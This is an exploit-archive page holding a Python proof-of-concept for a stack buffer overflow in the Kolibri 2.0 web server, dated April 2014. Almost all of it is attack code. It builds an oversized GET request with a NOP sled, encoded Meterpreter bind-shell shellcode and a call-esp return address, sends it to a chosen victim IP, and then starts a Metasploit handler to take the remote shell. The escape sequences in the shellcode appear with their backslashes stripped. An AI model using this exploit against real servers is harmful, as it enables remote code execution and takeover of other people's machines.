Home / exploits Kolibri 2.0 Stack Buffer Overflow
Posted on 25 April 2014
#!/usr/bin/python # Exploit Title: Kolibri GET request Stack buffer Overflow # Date: 25 April 2014 # Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org # Vendor Homepage: http://www.senkas.com/kolibri/download.php # Version: Kolibri 2.0 # Tested on: Windows XP SP3, Spanish # Thanks:To my wife for putting up with my possessions # Description: # A buffer overflow is triggered when a long GET command is sent to the server. import socket, sys, os, time if len(sys.argv) != 3: print "[*] Uso: %s <Ip Victima> <Puerto> " % sys.argv[0] print "[*] Exploit created by Polunchis" print "[*] https://www.intrusionlabs.com.mx" sys.exit(0) host = sys.argv[1] port = int(sys.argv[2]) #./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b 'x00xffx0ax0dx20x40' shellcode = ( "x29xc9x83xe9xb5xe8xffxffxffxffxc0x5ex81x76x0e" "xaax86x33x5fx83xeexfcxe2xf4x56x6exbax5fxaax86" "x53xd6x4fxb7xe1x3bx21xd4x03xd4xf8x8axb8x0dxbe" "x0dx41x77xa5x31x79x79x9bx79x02x9fx06xbax52x23" "xa8xaax13x9ex65x8bx32x98x48x76x61x08x21xd4x23" "xd4xe8xbax32x8fx21xc6x4bxdax6axf2x79x5ex7axd6" "xb8x17xb2x0dx6bx7fxabx55xd0x63xe3x0dx07xd4xab" "x50x02xa0x9bx46x9fx9ex65x8bx32x98x92x66x46xab" "xa9xfbxcbx64xd7xa2x46xbdxf2x0dx6bx7bxabx55x55" "xd4xa6xcdxb8x07xb6x87xe0xd4xaex0dx32x8fx23xc2" "x17x7bxf1xddx52x06xf0xd7xccxbfxf2xd9x69xd4xb8" "x6dxb5x02xc2xb5x01x5fxaaxeex44x2cx98xd9x67x37" "xe6xf1x15x58x55x53x8bxcfxabx86x33x76x6exd2x63" "x37x83x06x58x5fx55x53x63x0fxfaxd6x73x0fxeaxd6" "x5bxb5xa5x59xd3xa0x7fx11x02x84xf9xeex31x5fxbb" "xdaxbaxb9xc0x96x65x08xc2x44xe8x68xcdx79xe6x0c" "xfdxeex84xb6x92x79xccx8axf9xd5x64x37xdex6ax08" "xbex55x53x64xc8xc2xf3x5dx12xcbx79xe6x35xaaxec" "x37x09xfdxeex31x86x62xd9xccx8ax21xb0x59x1fxc2" "x86x23x5fxaaxd0x59x5fxc2xdex97x0cx4fx79xe6xcc" "xf9xecx33x09xf9xd1x5bx5dx73x4ex6cxa0x7fx87xf0" "x76x6cx03xc5x2ax46x45x33x5f" ) nop = "A" * 33 + 'x90' * 20 junk = "C" *(515-(len(nop)+len(shellcode))) opcode= "x83xc4x44x83xc4x44x83xc4x44xffxe4" eip = 'x63x46x92x7c' #7c86467b 7C924663 call esp buffer = nop + shellcode + junk + eip + opcode + "B" * 60 req = ("GET /" + buffer + " HTTP/1.1 " "Host: " + host + ":" + str(port) + " " "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 " "Connection: keep-alive ") print " [+] Connecting to %s:%d" % (host, port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host, port)) print " [+] Sending payload.." + "nop: " + str(len(nop)) + " junk: " + str(len(junk)) + " shellcode: " + str(len(shellcode)) s.send(req) data = s.recv(1024) print " [+] Closing connection.." s.close() print "[+] Exploit Sent Successfully" print "[+] Waiting for 3 sec before spawning shell to " + host + ":4444 " print " " time.sleep(3) os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E") print "[-] Connection lost from " + host + ":4444 " except: print "[-] Could not connect to " + host + ":4444 " sys.exit(0)
